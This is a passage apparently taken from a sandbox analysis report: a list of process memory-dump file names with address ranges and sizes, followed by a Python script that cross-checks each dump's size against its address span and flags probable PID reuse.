  • memory/3292-338-0x000001492B5B0000-0x000001492B5D0000-memory.dmp (Filesize 128KB)
  • memory/3292-340-0x000001492B570000-0x000001492B590000-memory.dmp (Filesize 128KB)
  • memory/3384-16-0x00000225E6B70000-0x00000225E6B90000-memory.dmp (Filesize 128KB)
  • memory/3384-18-0x00000225E6B30000-0x00000225E6B50000-memory.dmp (Filesize 128KB)
  • memory/3384-20-0x00000225E6F40000-0x00000225E6F60000-memory.dmp (Filesize 128KB)
  • memory/3448-261-0x00000000040D0000-0x00000000040D1000-memory.dmp (Filesize 4KB)
  • memory/3480-195-0x0000000004F00000-0x0000000004F01000-memory.dmp (Filesize 4KB)
  • memory/3568-32-0x0000000004F30000-0x0000000004F31000-memory.dmp (Filesize 4KB)
  • memory/3572-308-0x0000000004BE0000-0x0000000004BE1000-memory.dmp (Filesize 4KB)
  • memory/3616-88-0x00000157D26E0000-0x00000157D2700000-memory.dmp (Filesize 128KB)
  • memory/3616-161-0x000002AA5E5F0000-0x000002AA5E610000-memory.dmp (Filesize 128KB)
  • memory/3616-158-0x000002AA5DFE0000-0x000002AA5E000000-memory.dmp (Filesize 128KB)

                                                                                                                                                • memory/3616-156-0x000002AA5E220000-0x000002AA5E240000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3616-86-0x00000157D2080000-0x00000157D20A0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3616-84-0x00000157D20C0000-0x00000157D20E0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3632-111-0x000001937A760000-0x000001937A780000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3632-109-0x000001937A350000-0x000001937A370000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3632-107-0x000001937A390000-0x000001937A3B0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3668-124-0x0000000004B10000-0x0000000004B11000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  4KB

                                                                                                                                                • memory/3800-294-0x000002068C200000-0x000002068C220000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3800-296-0x000002068C600000-0x000002068C620000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3800-292-0x000002068C240000-0x000002068C260000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/3920-52-0x00000000045A0000-0x00000000045A1000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  4KB

                                                                                                                                                • memory/4332-134-0x000002EC8B440000-0x000002EC8B460000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4332-132-0x000002EC8B480000-0x000002EC8B4A0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4332-137-0x000002EC8B850000-0x000002EC8B870000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4396-76-0x0000000002800000-0x0000000002801000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  4KB

                                                                                                                                                • memory/4436-272-0x0000019D8AEB0000-0x0000019D8AED0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4436-275-0x0000019D8B4C0000-0x0000019D8B4E0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4436-269-0x0000019D8AEF0000-0x0000019D8AF10000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4436-365-0x000002892D070000-0x000002892D090000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4436-363-0x000002892CC60000-0x000002892CC80000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4436-361-0x000002892CCA0000-0x000002892CCC0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4452-171-0x0000000003400000-0x0000000003401000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  4KB

                                                                                                                                                • memory/4472-202-0x0000025F94740000-0x0000025F94760000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4472-204-0x0000025F94700000-0x0000025F94720000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4472-207-0x0000025F94B00000-0x0000025F94B20000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4528-241-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  4KB

                                                                                                                                                • memory/4852-183-0x000002DFF8350000-0x000002DFF8370000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4852-181-0x000002DFF7F40000-0x000002DFF7F60000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/4852-179-0x000002DFF7F80000-0x000002DFF7FA0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/5060-249-0x000001C263660000-0x000001C263680000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/5060-250-0x000001C263620000-0x000001C263640000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB

                                                                                                                                                • memory/5060-252-0x000001C263A30000-0x000001C263A50000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  128KB
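The dump names above encode the PID, a dump index, and the start and end address of the region that was captured, so the reported Filesize can be cross-checked against the address range before anyone spends time loading the dumps. Two things in the listing are worth noticing: every 128KB entry is a 0x20000-byte region and every 4KB entry a single 0x1000-byte page, and PIDs 3616 and 4436 each appear with two disjoint address bases (0x157... and 0x2AA..., 0x19D... and 0x289...), which is what PID reuse by two different processes looks like rather than one process. The script below is an added example, not part of the sandbox report or its tooling; it parses a subset of the entries copied from the listing, flags any size or alignment inconsistency, and groups regions per PID by the high 32 bits of the start address. Treating the middle number as a sequential dump counter and the high-32-bit prefix as a per-process signature are both assumptions of this example, not facts the report states.

```python
import re
from collections import defaultdict

# Memory-dump entries copied from the listing above (name, reported Filesize).
# A subset is enough to show the checks; the full list parses the same way.
REPORT_ENTRIES = [
    ("memory/3384-20-0x00000225E6F40000-0x00000225E6F60000-memory.dmp", "128KB"),
    ("memory/3448-261-0x00000000040D0000-0x00000000040D1000-memory.dmp", "4KB"),
    ("memory/3616-88-0x00000157D26E0000-0x00000157D2700000-memory.dmp", "128KB"),
    ("memory/3616-161-0x000002AA5E5F0000-0x000002AA5E610000-memory.dmp", "128KB"),
    ("memory/3616-86-0x00000157D2080000-0x00000157D20A0000-memory.dmp", "128KB"),
    ("memory/4436-272-0x0000019D8AEB0000-0x0000019D8AED0000-memory.dmp", "128KB"),
    ("memory/4436-365-0x000002892D070000-0x000002892D090000-memory.dmp", "128KB"),
    ("memory/5060-249-0x000001C263660000-0x000001C263680000-memory.dmp", "128KB"),
]

# memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp. Assumption: <index> is the
# sandbox's sequential dump counter; the page itself does not say so.
DUMP_NAME = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
SIZE_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}
PAGE = 0x1000


def parse_size(text):
    """'128KB' -> 131072. Rejects anything that is not <int><unit>."""
    m = re.fullmatch(r"(\d+)(B|KB|MB)", text.strip())
    if m is None:
        raise ValueError(f"unparseable size: {text!r}")
    return int(m.group(1)) * SIZE_UNITS[m.group(2)]


def parse_entry(name, size_text):
    """Split one dump name into its fields; addresses become integers."""
    m = DUMP_NAME.match(name)
    if m is None:
        raise ValueError(f"not a memory dump name: {name!r}")
    return {
        "name": name,
        "pid": int(m["pid"]),
        "idx": int(m["idx"]),
        "start": int(m["start"], 16),
        "end": int(m["end"], 16),
        "size": parse_size(size_text),
    }


def check_entry(e):
    """Consistency findings for one entry (an empty list means it checks out)."""
    findings = []
    span = e["end"] - e["start"]
    if span <= 0:
        findings.append("end is not above start")
    elif span != e["size"]:
        findings.append(f"range is {span} bytes but Filesize says {e['size']}")
    if e["start"] % PAGE or e["end"] % PAGE:
        findings.append("region is not page-aligned")
    return findings


def address_bases(entries):
    """Per PID, the distinct high 32 bits of the region start addresses.

    Heuristic (an assumption of this example): regions of one 64-bit process
    share this prefix, so a PID with more than one base is most likely two
    different processes that reused the PID. Regions in the 32-bit range
    (e.g. 0x040D0000) all fall under base 0.
    """
    bases = defaultdict(set)
    for e in entries:
        bases[e["pid"]].add(e["start"] >> 32)
    return {pid: sorted(b) for pid, b in bases.items()}


def suspected_pid_reuse(entries):
    return {pid: b for pid, b in address_bases(entries).items() if len(b) > 1}


def audit(raw_entries):
    """Parse every (name, size) pair and return the cross-checks in one dict."""
    entries = [parse_entry(n, s) for n, s in raw_entries]
    return {
        "mismatches": {e["name"]: f for e in entries if (f := check_entry(e))},
        "pid_reuse": suspected_pid_reuse(entries),
        "by_pid": {
            pid: sorted(e["idx"] for e in entries if e["pid"] == pid)
            for pid in sorted({e["pid"] for e in entries})
        },
    }


if __name__ == "__main__":
    for key, value in audit(REPORT_ENTRIES).items():
        print(key, value)
```

On the entries above `audit` reports no size or alignment mismatches and lists 3616 and 4436 under `pid_reuse`; `by_pid` gives the dump indices in order, which is the order to read the dumps in if the counter assumption holds. A mismatch between the address span and the stated Filesize would mean either a truncated dump or a mislabelled entry, and is worth resolving before treating the dump as a faithful image of that region.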